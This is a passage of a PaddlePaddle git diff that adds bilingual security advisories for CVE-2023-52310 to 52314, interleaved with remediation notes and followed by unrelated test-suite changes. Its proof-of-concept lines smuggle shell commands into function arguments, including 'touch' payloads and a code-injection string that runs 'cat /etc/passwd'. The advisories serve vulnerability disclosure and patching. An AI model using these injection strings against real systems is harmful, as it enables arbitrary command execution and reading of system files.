+ +This vulnerability has been reported by huntr.com and leeya_bug. 
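Note: PDSA-2023-019 here and PDSA-2023-020 below are both shell-injection issues: attacker-controlled strings such as `hours="9;touch /home/test/aaaa"` end up on a shell command line. The usual remediation pattern is to allow-list the expected token format and to launch any subprocess with an argument list so that nothing is parsed by a shell. The snippet below illustrates that pattern only; the regular expression and the helper name are assumptions, not the code of the actual patches.

```python
import re
import subprocess

# Assumed allow-list: day/hour tokens consist of digits plus a few range characters.
SAFE_TOKEN = re.compile(r"^[0-9{}.;,\-]+$")

def run_with_untrusted_tokens(days: str, hours: str) -> None:
    for value in (days, hours):
        if not SAFE_TOKEN.fullmatch(value):
            raise ValueError(f"rejecting suspicious token: {value!r}")
    # Argument-list form: even a stray ';' is passed as literal text and is
    # never interpreted by a shell (no shell=True, no string interpolation).
    subprocess.run(["/bin/echo", days, hours], check=True)

run_with_untrusted_tokens("{20190720..20190729}", "0;6;12;18")
# run_with_untrusted_tokens("{20190720..20190729}", "9;touch /home/test/aaaa")  -> ValueError
```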
diff --git a/security/advisory/pdsa-2023-019_cn.md b/security/advisory/pdsa-2023-019_cn.md new file mode 100644 index 00000000000000..096d4c191ebc2b --- /dev/null +++ b/security/advisory/pdsa-2023-019_cn.md @@ -0,0 +1,35 @@ +## PDSA-2023-019: Command injection in get_online_pass_interval + +### CVE编号 + +CVE-2023-52310 + +### 影响 + +`get_online_pass_interval`存在命令注入漏洞,可造成任意命令执行,PoC代码如下: + +```python +from paddle.incubate.distributed.fleet.fleet_util import FleetUtil + +fleet_util = FleetUtil() +online_pass_interval = fleet_util.get_online_pass_interval( + days="{20190720..20190729}", + hours="9;touch /home/test/aaaa", + split_interval=5, + split_per_pass=2, + is_data_hourly_placed=False +) +``` + +### 补丁 + +我们在commits [1aae481dfd7d2055c801563e254f1484b974b68e](https://github.com/PaddlePaddle/Paddle/pull/60023/commits/1aae481dfd7d2055c801563e254f1484b974b68e)、[c62d87eb91c84154af40946f17205d86f608866b](https://github.com/PaddlePaddle/Paddle/pull/60544/commits/c62d87eb91c84154af40946f17205d86f608866b) 和 [f8560c903c80450e37b8f304a9cd8207678f2f83](https://github.com/PaddlePaddle/Paddle/pull/60615/commits/f8560c903c80450e37b8f304a9cd8207678f2f83) 中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 huntr.com 和 leeya_bug 提交。 diff --git a/security/advisory/pdsa-2023-020.md b/security/advisory/pdsa-2023-020.md new file mode 100644 index 00000000000000..ed3a5966d6ca60 --- /dev/null +++ b/security/advisory/pdsa-2023-020.md @@ -0,0 +1,28 @@ +## PDSA-2023-020: Command injection in _wget_download + +### CVE Number + +CVE-2023-52311 + +### Impact + +Command injection in `_wget_download` which could lead to execute arbitrary commands. The PoC is as follows: + +```python +from paddle import utils + +utils.download._wget_download("aa; touch codexecution", "bb") +``` + +### Patches + +We have patched the issue in commit [d5550d3f2f5bab48c783b4986ba1cd8e061ce542](https://github.com/PaddlePaddle/Paddle/pull/59957/commits/d5550d3f2f5bab48c783b4986ba1cd8e061ce542). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by huntr.com. diff --git a/security/advisory/pdsa-2023-020_cn.md b/security/advisory/pdsa-2023-020_cn.md new file mode 100644 index 00000000000000..a6bd1321592e62 --- /dev/null +++ b/security/advisory/pdsa-2023-020_cn.md @@ -0,0 +1,28 @@ +## PDSA-2023-020: Command injection in _wget_download + +### CVE编号 + +CVE-2023-52311 + +### 影响 + +`_wget_download`存在命令注入漏洞,可造成任意命令执行,PoC代码如下: + +```python +from paddle import utils + +utils.download._wget_download("aa; touch codexecution", "bb") +``` + +### 补丁 + +我们在commit [d5550d3f2f5bab48c783b4986ba1cd8e061ce542](https://github.com/PaddlePaddle/Paddle/pull/59957/commits/d5550d3f2f5bab48c783b4986ba1cd8e061ce542)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 huntr.com 提交。 diff --git a/security/advisory/pdsa-2023-021.md b/security/advisory/pdsa-2023-021.md new file mode 100644 index 00000000000000..6a8ec45b33e23c --- /dev/null +++ b/security/advisory/pdsa-2023-021.md @@ -0,0 +1,33 @@ +## PDSA-2023-021: Null pointer dereference in paddle.crop + +### CVE Number + +CVE-2023-52312 + +### Impact + +Null pointer dereference in `paddle.crop` when tensor dims are invalid . 
The PoC is as follows: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(0, 10, [2, 2]).astype(np.int32)) +shape = paddle.to_tensor([-1, 0], dtype='int32') +offsets = paddle.to_tensor([], dtype='int32') + +out = paddle.crop(x, shape, offsets) +``` + +### Patches + +We have patched the issue in commit [c074de6911944d5d30d28cc7ce2c7099f1c87bce](https://github.com/PaddlePaddle/Paddle/pull/59967/commits/c074de6911944d5d30d28cc7ce2c7099f1c87bce). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Peng Zhou (zpbrent) from Shanghai University. diff --git a/security/advisory/pdsa-2023-021_cn.md b/security/advisory/pdsa-2023-021_cn.md new file mode 100644 index 00000000000000..eff0b0c2225aac --- /dev/null +++ b/security/advisory/pdsa-2023-021_cn.md @@ -0,0 +1,33 @@ +## PDSA-2023-021: Null pointer dereference in paddle.crop + +### CVE编号 + +CVE-2023-52312 + +### 影响 + +输入张量的维度异常时,`paddle.crop`会引发空指针解引用,PoC代码如下: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(0, 10, [2, 2]).astype(np.int32)) +shape = paddle.to_tensor([-1, 0], dtype='int32') +offsets = paddle.to_tensor([], dtype='int32') + +out = paddle.crop(x, shape, offsets) +``` + +### 补丁 + +我们在commit [c074de6911944d5d30d28cc7ce2c7099f1c87bce](https://github.com/PaddlePaddle/Paddle/pull/59967/commits/c074de6911944d5d30d28cc7ce2c7099f1c87bce)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Peng Zhou (zpbrent) from Shanghai University 提交。 diff --git a/security/advisory/pdsa-2023-022.md b/security/advisory/pdsa-2023-022.md new file mode 100644 index 00000000000000..b5b3b3519c9c0e --- /dev/null +++ b/security/advisory/pdsa-2023-022.md @@ -0,0 +1,30 @@ +## PDSA-2023-022: FPE in paddle.argmin and paddle.argmax + +### CVE Number + +CVE-2023-52313 + +### Impact + +FPE in `paddle.argmin` and `paddle.argmax` when input `x.numel()` is 0. The PoC is as follows: + +```python +import paddle + +data = paddle.to_tensor([], dtype="int32") + +paddle.argmax(data, axis=0) +``` + +### Patches + +We have patched the issue in commit [41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794](https://github.com/PaddlePaddle/Paddle/pull/59976/commits/41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Peng Zhou (zpbrent) from Shanghai University. 
diff --git a/security/advisory/pdsa-2023-022_cn.md b/security/advisory/pdsa-2023-022_cn.md new file mode 100644 index 00000000000000..d7c57f94394955 --- /dev/null +++ b/security/advisory/pdsa-2023-022_cn.md @@ -0,0 +1,30 @@ +## PDSA-2023-022: FPE in paddle.argmin and paddle.argmax + +### CVE编号 + +CVE-2023-52313 + +### 影响 + +输入`x.numel()`为0时`paddle.argmin`和`paddle.argmax`会引发除0异常,PoC代码如下: + +```python +import paddle + +data = paddle.to_tensor([], dtype="int32") + +paddle.argmax(data, axis=0) +``` + +### 补丁 + +我们在commit [41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794](https://github.com/PaddlePaddle/Paddle/pull/59976/commits/41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Peng Zhou (zpbrent) from Shanghai University 提交。 diff --git a/security/advisory/pdsa-2023-023.md b/security/advisory/pdsa-2023-023.md new file mode 100644 index 00000000000000..c2671f7f87adca --- /dev/null +++ b/security/advisory/pdsa-2023-023.md @@ -0,0 +1,28 @@ +## PDSA-2023-023: Command injection in convert_shape_compare + +### CVE Number + +CVE-2023-52314 + +### Impact + +Command injection in `convert_shape_compare` which could lead to execute arbitrary commands. The PoC is as follows: + +```python +import paddle + +paddle.jit.dy2static.convert_operators.convert_shape_compare('prefix','+ str(__import__("os").system("cat /etc/passwd")) +','1') +``` + +### Patches + +We have patched the issue in commit [c3b6414eb313480f1417abe92d410dfe89723097](https://github.com/PaddlePaddle/Paddle/pull/60097/commits/c3b6414eb313480f1417abe92d410dfe89723097). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by leeya_bug. 
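Note: the PDSA-2023-023 PoC works because the comparison string handed to `convert_shape_compare` is spliced into dynamically evaluated code. Independent of how the upstream patch handles it, the robust pattern for this kind of API is to dispatch through a fixed table of comparison operators instead of building and evaluating source text. The snippet below is a generic sketch of that idea, not Paddle's implementation.

```python
import operator

ALLOWED_OPS = {
    "<": operator.lt, "<=": operator.le,
    ">": operator.gt, ">=": operator.ge,
    "==": operator.eq, "!=": operator.ne,
}

def compare(lhs, op: str, rhs):
    try:
        fn = ALLOWED_OPS[op]
    except KeyError:
        raise ValueError(f"unsupported comparison operator: {op!r}") from None
    return fn(lhs, rhs)

print(compare(3, "<", 5))  # True
# compare(3, '+ str(__import__("os").system("id")) +', 5) raises ValueError; nothing is executed
```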
diff --git a/security/advisory/pdsa-2023-023_cn.md b/security/advisory/pdsa-2023-023_cn.md new file mode 100644 index 00000000000000..3de87a4d707674 --- /dev/null +++ b/security/advisory/pdsa-2023-023_cn.md @@ -0,0 +1,28 @@ +## PDSA-2023-023: Command injection in convert_shape_compare + +### CVE编号 + +CVE-2023-52314 + +### 影响 + +`convert_shape_compare`存在命令注入漏洞,可造成任意命令执行,PoC代码如下: + +```python +import paddle + +paddle.jit.dy2static.convert_operators.convert_shape_compare('prefix','+ str(__import__("os").system("cat /etc/passwd")) +','1') +``` + +### 补丁 + +我们在commit [c3b6414eb313480f1417abe92d410dfe89723097](https://github.com/PaddlePaddle/Paddle/pull/60097/commits/c3b6414eb313480f1417abe92d410dfe89723097)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 leeya_bug 提交。 diff --git a/test/auto_parallel/hybrid_strategy/CMakeLists.txt b/test/auto_parallel/hybrid_strategy/CMakeLists.txt index 8d4c34745d8238..4d15ae4b30d922 100644 --- a/test/auto_parallel/hybrid_strategy/CMakeLists.txt +++ b/test/auto_parallel/hybrid_strategy/CMakeLists.txt @@ -10,7 +10,7 @@ if((WITH_GPU) AND (LINUX)) test_semi_auto_parallel_hybrid_strategy ENVS "http_proxy=;https_proxy=;PYTHONPATH=../..:${PADDLE_BINARY_DIR}/python") set_tests_properties(test_semi_auto_parallel_hybrid_strategy - PROPERTIES TIMEOUT "180" LABELS "RUN_TYPE=HYBRID") + PROPERTIES TIMEOUT "600" LABELS "RUN_TYPE=HYBRID") endif() if((WITH_GPU) AND (LINUX)) py_test_modules( diff --git a/test/collective/fleet/run_server_for_communicator_half_async.py b/test/collective/fleet/run_server_for_communicator_half_async.py new file mode 100644 index 00000000000000..14d8fd80331b35 --- /dev/null +++ b/test/collective/fleet/run_server_for_communicator_half_async.py @@ -0,0 +1,38 @@ +# Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import os + +from test_communicator_half_async import TestCommunicatorHalfAsyncEnd2End + +import paddle + +paddle.enable_static() + +pipe_name = os.getenv("PIPE_FILE") + + +class RunServer(TestCommunicatorHalfAsyncEnd2End): + def runTest(self): + pass + + +os.environ["TRAINING_ROLE"] = "PSERVER" +os.environ["http_proxy"] = "" +os.environ["https_proxy"] = "" +half_run_server = RunServer() +with open(pipe_name, 'w') as pipe: + pipe.write('done') + +half_run_server.run_ut() diff --git a/test/collective/fleet/test_communicator_half_async.py b/test/collective/fleet/test_communicator_half_async.py index 25e5302fb444fd..687337f25ab2ae 100644 --- a/test/collective/fleet/test_communicator_half_async.py +++ b/test/collective/fleet/test_communicator_half_async.py @@ -15,6 +15,7 @@ import os import subprocess import sys +import tempfile import unittest import numpy @@ -23,6 +24,7 @@ from paddle import base from paddle.distributed import fleet from paddle.distributed.fleet.base import role_maker +from paddle.distributed.utils.launch_utils import find_free_ports paddle.enable_static() @@ -30,25 +32,44 @@ class TestCommunicatorHalfAsyncEnd2End(unittest.TestCase): def net(self): x = paddle.static.data(name='x', shape=[-1, 13], dtype='float32') - y_predict = paddle.static.nn.fc(x, size=1, activation=None) - y = paddle.static.data(name='y', shape=[-1, 1], dtype='float32') + x1 = paddle.static.data( + name='x1', shape=[-1, 1], dtype='int64', lod_level=1 + ) + emb = paddle.static.nn.embedding( + input=x1, + size=[10000, 10], + param_attr=base.ParamAttr( + name="embedding", + initializer=paddle.nn.initializer.Constant(value=0.01), + ), + is_sparse=True, + ) + + pool = paddle.static.nn.sequence_lod.sequence_pool( + input=emb.squeeze(-2), pool_type="sum" + ) + z = paddle.concat([x, pool], axis=1) + + y_predict = paddle.static.nn.fc(x=z, size=1) + y = paddle.static.data(name='y', shape=[-1, 1], dtype='float32') cost = paddle.nn.functional.square_error_cost(input=y_predict, label=y) avg_cost = paddle.mean(cost) - return avg_cost, x, y + return avg_cost, x, x1, y def fake_reader(self): def reader(): for i in range(10000): x = numpy.random.random((1, 13)).astype('float32') + z = numpy.random.randint(0, 9999, (1, 1)).astype('int64') y = numpy.random.randint(0, 2, (1, 1)).astype('int64') - yield x, y + yield x, z, y return reader def run_pserver(self, role, strategy): fleet.init(role) - avg_cost, x, y = self.net() + avg_cost, x, z, y = self.net() optimizer = paddle.optimizer.SGD(0.01) optimizer = fleet.distributed_optimizer(optimizer, strategy) optimizer.minimize(avg_cost) @@ -61,20 +82,20 @@ def run_trainer(self, role, strategy): exe = base.Executor(place) fleet.init(role) - avg_cost, x, y = self.net() + avg_cost, x, z, y = self.net() optimizer = paddle.optimizer.SGD(0.01) optimizer = fleet.distributed_optimizer(optimizer, strategy) optimizer.minimize(avg_cost) - exe.run(paddle.static.default_startup_program()) + exe.run(base.default_startup_program()) fleet.init_worker() train_reader = paddle.batch(self.fake_reader(), batch_size=24) - feeder = base.DataFeeder(place=place, feed_list=[x, y]) + feeder = base.DataFeeder(place=place, feed_list=[x, z, y]) for batch_id, data in enumerate(train_reader()): exe.run( - paddle.static.default_main_program(), + base.default_main_program(), feed=feeder.feed(data), fetch_list=[], ) @@ -82,19 +103,18 @@ def run_trainer(self, role, strategy): fleet.stop_worker() def run_ut(self): - strategy = paddle.distributed.fleet.DistributedStrategy() - strategy.a_sync = True - training_role = 
os.getenv("TRAINING_ROLE", "TRAINER") - role = role_maker.UserDefinedRoleMaker( - current_id=0, - role=role_maker.Role.WORKER - if training_role == "TRAINER" - else role_maker.Role.SERVER, - worker_num=1, - server_endpoints=["127.0.0.1:6002"], - ) + os.environ["PADDLE_PSERVER_NUMS"] = "1" + os.environ["PADDLE_TRAINERS_NUM"] = "1" + os.environ["PADDLE_TRAINER_ID"] = "0" + os.environ["PADDLE_TRAINERS_NUM"] = "1" + os.environ["POD_IP"] = "127.0.0.1" + + role = role_maker.PaddleCloudRoleMaker() + + strategy = paddle.distributed.fleet.DistributedStrategy() + strategy.a_sync = True if training_role == "TRAINER": self.run_trainer(role, strategy) @@ -102,61 +122,39 @@ def run_ut(self): self.run_pserver(role, strategy) def test_communicator(self): - run_server_cmd = """ + temp_dir = tempfile.TemporaryDirectory() + pipe_name = os.path.join(temp_dir.name, 'mypipe') + try: + os.mkfifo(pipe_name) + except OSError as oe: + print(f"Failed to create pipe: {oe}") -import sys -import os + port = find_free_ports(1).pop() -import time -import threading -import subprocess -import unittest -import numpy - -from test_communicator_half_async import TestCommunicatorHalfAsyncEnd2End - -import paddle -import paddle.base as base -import paddle.distributed.fleet as fleet -import paddle.distributed.fleet.base.role_maker as role_maker - -paddle.enable_static() - -class RunServer(TestCommunicatorHalfAsyncEnd2End): - def runTest(self): - pass - -os.environ["http_proxy"] = "" -os.environ["https_proxy"] = "" -os.environ["TRAINING_ROLE"] = "PSERVER" -half_run_server = RunServer() -half_run_server.run_ut() -""" - - server_file = "run_server_for_communicator_haflaysnc.py" - with open(server_file, "w") as wb: - wb.write(run_server_cmd) os.environ["TRAINING_ROLE"] = "PSERVER" - _python = sys.executable + os.environ["PADDLE_PORT"] = str(port) + os.environ["PADDLE_PSERVERS_IP_PORT_LIST"] = f"127.0.0.1:{port}" + os.environ["PIPE_FILE"] = pipe_name + _python = sys.executable + server_file = "run_server_for_communicator_half_async.py" ps_cmd = f"{_python} {server_file}" + ps_proc = subprocess.Popen( ps_cmd.strip().split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) - os.environ["http_proxy"] = "" - os.environ["https_proxy"] = "" + with open(pipe_name, 'r') as pipe: + start_command = pipe.read() + os.environ["TRAINING_ROLE"] = "TRAINER" - os.environ["FLAGS_communicator_send_queue_size"] = "1" - os.environ["FLAGS_communicator_max_merge_var_num"] = "1" self.run_ut() ps_proc.kill() - - if os.path.exists(server_file): - os.remove(server_file) + ps_proc.wait() + outs, errs = ps_proc.communicate() if __name__ == '__main__': diff --git a/test/cpp/fluid/CMakeLists.txt b/test/cpp/fluid/CMakeLists.txt index 59ed51f7681685..e811e547511a84 100644 --- a/test/cpp/fluid/CMakeLists.txt +++ b/test/cpp/fluid/CMakeLists.txt @@ -1,8 +1,6 @@ add_subdirectory(benchmark) add_subdirectory(framework) -add_subdirectory(inference) - if(WITH_CINN) add_subdirectory(cinn) endif() diff --git a/test/cpp/fluid/inference/CMakeLists.txt b/test/cpp/fluid/inference/CMakeLists.txt deleted file mode 100644 index 512d2b1553c8c9..00000000000000 --- a/test/cpp/fluid/inference/CMakeLists.txt +++ /dev/null @@ -1 +0,0 @@ -add_subdirectory(utils) diff --git a/test/cpp/fluid/inference/utils/CMakeLists.txt b/test/cpp/fluid/inference/utils/CMakeLists.txt deleted file mode 100644 index 3ea72839b19243..00000000000000 --- a/test/cpp/fluid/inference/utils/CMakeLists.txt +++ /dev/null @@ -1,16 +0,0 @@ -if(WITH_TESTING) - if(NOT APPLE) - inference_base_test( - 
infer_io_utils_tester SRCS io_utils_tester.cc - DEPS - paddle_inference_shared - common - ) - endif() -endif() - -if(WITH_ONNXRUNTIME AND WIN32) - # Copy onnxruntime for some c++ test in Windows, since the test will - # be build only in CI, so suppose the generator in Windows is Ninja. - copy_onnx(infer_io_utils_tester) -endif() diff --git a/test/cpp/fluid/inference/utils/io_utils_tester.cc b/test/cpp/fluid/inference/utils/io_utils_tester.cc deleted file mode 100644 index 756027fb6cb9bd..00000000000000 --- a/test/cpp/fluid/inference/utils/io_utils_tester.cc +++ /dev/null @@ -1,154 +0,0 @@ -// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. - -#include -#include - -#include - -#include "paddle/fluid/inference/api/helper.h" -#include "paddle/fluid/inference/utils/io_utils.h" - -namespace paddle { -namespace inference { -namespace { - -bool pd_tensor_equal(const paddle::PaddleTensor& ref, - const paddle::PaddleTensor& t) { - bool is_equal = true; - VLOG(3) << "ref.name: " << ref.name << ", t.name: " << t.name; - VLOG(3) << "ref.dtype: " << ref.dtype << ", t.dtype: " << t.dtype; - VLOG(3) << "ref.lod_level: " << ref.lod.size() - << ", t.dtype: " << t.lod.size(); - VLOG(3) << "ref.data_len: " << ref.data.length() - << ", t.data_len: " << t.data.length(); - return is_equal && (ref.name == t.name) && (ref.lod == t.lod) && - (ref.dtype == t.dtype) && - (std::memcmp(ref.data.data(), t.data.data(), ref.data.length()) == 0); -} - -template -void test_io_utils() { - std::vector input({6, 8}); - paddle::PaddleTensor in; - in.name = "Hello"; - in.shape = {1, 2}; - in.lod = std::vector>{{0, 1}}; - in.data = paddle::PaddleBuf(static_cast(input.data()), - input.size() * sizeof(T)); - in.dtype = paddle::inference::PaddleTensorGetDType(); - std::stringstream ss; - paddle::inference::SerializePDTensorToStream(&ss, in); - paddle::PaddleTensor out; - paddle::inference::DeserializePDTensorToStream(ss, &out); - ASSERT_TRUE(pd_tensor_equal(in, out)); -} -} // namespace -} // namespace inference -} // namespace paddle - -TEST(infer_io_utils, float32) { paddle::inference::test_io_utils(); } - -TEST(infer_io_utils, tensors) { - // Create a float32 tensor. - std::vector input_fp32({1.1f, 3.2f, 5.0f, 8.2f}); - paddle::PaddleTensor in_fp32; - in_fp32.name = "Tensor.fp32_0"; - in_fp32.shape = {2, 2}; - in_fp32.data = paddle::PaddleBuf(static_cast(input_fp32.data()), - input_fp32.size() * sizeof(float)); - in_fp32.dtype = paddle::inference::PaddleTensorGetDType(); - - // Create a int64 tensor. - std::vector input_int64({5, 8}); - paddle::PaddleTensor in_int64; - in_int64.name = "Tensor.int64_0"; - in_int64.shape = {1, 2}; - in_int64.lod = std::vector>{{0, 1}}; - in_int64.data = paddle::PaddleBuf(static_cast(input_int64.data()), - input_int64.size() * sizeof(int64_t)); - in_int64.dtype = paddle::inference::PaddleTensorGetDType(); - - // Serialize tensors. 
- std::vector tensors_in({in_fp32}); - std::string file_path = "./io_utils_tensors"; - paddle::inference::SerializePDTensorsToFile(file_path, tensors_in); - - // Deserialize tensors. - std::vector tensors_out; - paddle::inference::DeserializePDTensorsToFile(file_path, &tensors_out); - - // Check results. - ASSERT_EQ(tensors_in.size(), tensors_out.size()); - for (size_t i = 0; i < tensors_in.size(); ++i) { - ASSERT_TRUE( - paddle::inference::pd_tensor_equal(tensors_in[i], tensors_out[i])); - } -} - -TEST(shape_info_io, read_and_write) { - const std::string path = "test_shape_info_io"; - std::map> min_shape, max_shape, opt_shape; - std::map> min_value, max_value, opt_value; - min_shape.insert( - std::make_pair("test1", std::vector{1, 3, 112, 112})); - max_shape.insert( - std::make_pair("test1", std::vector{1, 3, 224, 224})); - opt_shape.insert( - std::make_pair("test1", std::vector{1, 3, 224, 224})); - min_value.insert( - std::make_pair("test1", std::vector{1, 3, 112, 112})); - max_value.insert( - std::make_pair("test1", std::vector{1, 3, 224, 224})); - opt_value.insert( - std::make_pair("test1", std::vector{1, 3, 224, 224})); - paddle::inference::SerializeShapeRangeInfo( - path, min_shape, max_shape, opt_shape, min_value, max_value, opt_value); - min_shape.clear(); - max_shape.clear(); - opt_shape.clear(); - min_value.clear(); - max_value.clear(); - opt_value.clear(); - opt_shape.insert( - std::make_pair("test2", std::vector{1, 3, 224, 224})); - paddle::inference::DeserializeShapeRangeInfo(path, - &min_shape, - &max_shape, - &opt_shape, - &min_value, - &max_value, - &opt_value); - - min_shape.insert(std::make_pair("test1", std::vector{1, 3, 56, 56})); - std::vector names{"test1"}; - paddle::inference::UpdateShapeRangeInfo(path, - min_shape, - max_shape, - opt_shape, - min_value, - max_value, - opt_value, - names, - names); - - ASSERT_THROW(paddle::inference::DeserializeShapeRangeInfo("no_exists_file", - &min_shape, - &max_shape, - &opt_shape, - &min_value, - &max_value, - &opt_value); - , paddle::platform::EnforceNotMet); -} diff --git a/test/cpp/inference/api/tester_helper.h b/test/cpp/inference/api/tester_helper.h index a410df859fe450..a5d60ca6eec974 100644 --- a/test/cpp/inference/api/tester_helper.h +++ b/test/cpp/inference/api/tester_helper.h @@ -34,7 +34,6 @@ #include "paddle/fluid/inference/api/analysis_predictor.h" #include "paddle/fluid/inference/api/helper.h" #include "paddle/fluid/inference/api/paddle_inference_api.h" -#include "paddle/fluid/inference/utils/benchmark.h" #include "paddle/fluid/platform/profiler/event_tracing.h" #include "test/cpp/inference/api/config_printer.h" #include "test/cpp/inference/test_helper.h" @@ -69,9 +68,6 @@ PD_DEFINE_int32(num_threads, PD_DEFINE_bool(use_analysis, true, "Running the inference program in analysis mode."); -PD_DEFINE_bool(record_benchmark, - false, - "Record benchmark after profiling the model"); PD_DEFINE_double(accuracy, 1e-3, "Result Accuracy."); PD_DEFINE_double(quantized_accuracy, 2e-2, "Result Quantized Accuracy."); PD_DEFINE_bool(zero_copy, false, "Use ZeroCopy to speedup Feed/Fetch."); @@ -594,14 +590,6 @@ void PredictionRun(PaddlePredictor *predictor, if (sample_latency != nullptr) *sample_latency = batch_latency / FLAGS_batch_size; - - if (FLAGS_record_benchmark) { - Benchmark benchmark; - benchmark.SetName(FLAGS_model_name); - benchmark.SetBatchSize(FLAGS_batch_size); - benchmark.SetLatency(batch_latency); - benchmark.PersistToFile("benchmark_record.txt"); - } } void TestOneThreadPrediction( diff --git 
a/test/cpp/inference/api/trt_dynamic_shape_test.cc b/test/cpp/inference/api/trt_dynamic_shape_test.cc index 80929f10447b83..52336e7e8a5412 100644 --- a/test/cpp/inference/api/trt_dynamic_shape_test.cc +++ b/test/cpp/inference/api/trt_dynamic_shape_test.cc @@ -191,6 +191,7 @@ void TestTunedDynamic() { output_t->copy_to_cpu(out_data.data()); }; check_func(predictor_tuned.get()); + predictor_tuned.reset(nullptr); // check tuned_dynamic_shape AnalysisConfig config; diff --git a/test/cpp/inference/test.cmake b/test/cpp/inference/test.cmake index 33961a949369c5..7d3fb889e0e727 100644 --- a/test/cpp/inference/test.cmake +++ b/test/cpp/inference/test.cmake @@ -111,10 +111,9 @@ function(inference_base_test_build TARGET) add_executable(${TARGET} ${base_test_SRCS}) if("${base_test_DEPS};" MATCHES "paddle_inference_shared;") list(REMOVE_ITEM base_test_DEPS paddle_inference_shared) - target_link_libraries( - ${TARGET} $ - $) - add_dependencies(${TARGET} paddle_inference_shared benchmark) + target_link_libraries(${TARGET} + $) + add_dependencies(${TARGET} paddle_inference_shared) elseif("${base_test_DEPS};" MATCHES "paddle_inference_c_shared;") list(REMOVE_ITEM base_test_DEPS paddle_inference_c_shared) target_link_libraries(${TARGET} diff --git a/test/custom_runtime/CMakeLists.txt b/test/custom_runtime/CMakeLists.txt index e8b14445278be8..cf11b5555c3860 100644 --- a/test/custom_runtime/CMakeLists.txt +++ b/test/custom_runtime/CMakeLists.txt @@ -1,6 +1,6 @@ if(WITH_CUSTOM_DEVICE AND NOT WITH_GPU) set(PLUGIN_URL https://github.com/PaddlePaddle/PaddleCustomDevice.git) - set(PLUGIN_TAG develop) + set(PLUGIN_TAG release/2.6) file( GLOB TEST_OPS diff --git a/test/custom_runtime/test_collective_process_group_xccl.py b/test/custom_runtime/test_collective_process_group_xccl.py index 3c04a59ebfa742..83690a8ac11348 100644 --- a/test/custom_runtime/test_collective_process_group_xccl.py +++ b/test/custom_runtime/test_collective_process_group_xccl.py @@ -150,7 +150,7 @@ def setUp(self): cur_dir = os.path.dirname(os.path.abspath(__file__)) self.temp_dir = tempfile.TemporaryDirectory() cmd = 'cd {} \ - && git clone --depth 1 {} \ + && git clone --depth 1 {} -b {} \ && cd PaddleCustomDevice \ && git fetch origin \ && git checkout {} -b dev \ @@ -159,6 +159,7 @@ def setUp(self): self.temp_dir.name, os.getenv('PLUGIN_URL'), os.getenv('PLUGIN_TAG'), + os.getenv('PLUGIN_TAG'), sys.executable, ) os.system(cmd) diff --git a/test/custom_runtime/test_custom_cpu_plugin.py b/test/custom_runtime/test_custom_cpu_plugin.py index b92df8def9dd30..5478b7ecfad64c 100755 --- a/test/custom_runtime/test_custom_cpu_plugin.py +++ b/test/custom_runtime/test_custom_cpu_plugin.py @@ -26,7 +26,7 @@ def setUp(self): cur_dir = os.path.dirname(os.path.abspath(__file__)) self.temp_dir = tempfile.TemporaryDirectory() cmd = 'cd {} \ - && git clone --depth 1 {} \ + && git clone --depth 1 {} -b {} \ && cd PaddleCustomDevice \ && git fetch origin \ && git checkout {} -b dev \ @@ -35,6 +35,7 @@ def setUp(self): self.temp_dir.name, os.getenv('PLUGIN_URL'), os.getenv('PLUGIN_TAG'), + os.getenv('PLUGIN_TAG'), sys.executable, ) os.system(cmd) diff --git a/test/custom_runtime/test_custom_cpu_profiler_plugin.py b/test/custom_runtime/test_custom_cpu_profiler_plugin.py index 